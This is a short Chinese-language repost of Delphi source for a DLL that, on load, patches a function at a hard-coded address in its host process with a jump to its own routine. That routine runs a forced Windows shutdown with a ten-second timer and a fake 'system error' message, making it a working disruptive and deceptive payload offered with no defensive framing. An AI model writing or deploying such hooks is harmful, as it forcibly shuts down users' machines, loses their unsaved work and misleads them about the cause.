本文整理自网络,侵删。
原理就不用说了吧,会玩HOOK的老兄都知道啦.............
Procedure MyFunctionAddress();
begin
winexec('cmd /c shutdown -s -t 10 -f -c 系统出错.',0 );
end;
Procedure Modify();
var
dat:DWORD;
zrn: Cardinal;
FunctionPointer:Pointer;
tpv:array [0..3] of Byte;
NewAddress:array [0..7] of Byte;
OldAddress:array [0..7] of Byte;
begin
FunctionPointer:=Pointer($45411CB8); //要被替换的程序里那个要替换的函数的地址.
dat:=DWORD(@MyFunctionAddress);
Move(dat, tpv, 4);
NewAddress[0] := $B8;
NewAddress[1] := tpv[0];
NewAddress[2] := tpv[1];
NewAddress[3] := tpv[2];
NewAddress[4] := tpv[3];
NewAddress[5] := $FF;
NewAddress[6] := $E0;
NewAddress[7] := 0;
if ReadProcessMemory( GetCurrentProcess,FunctionPointer, @OldAddress, 8, zrn) then
begin
WriteProcessMemory(GetCurrentProcess,FunctionPointer, @NewAddress, 8, zrn);
end;
end;
procedure DllMain(Reason: Integer);
begin
case Reason of
DLL_PROCESS_ATTACH:
begin
Modify();
end;
DLL_PROCESS_DETACH:
begin
end;
end;
end;
begin
DLLProc:=@DllMain;
DllMain(DLL_PROCESS_ATTACH);
end.
相关阅读 >>
Delphi 的 tstringbuilder 可以完美实现jave ,c#的tstringbuilder功能
更多相关阅读请进入《Delphi》频道 >>
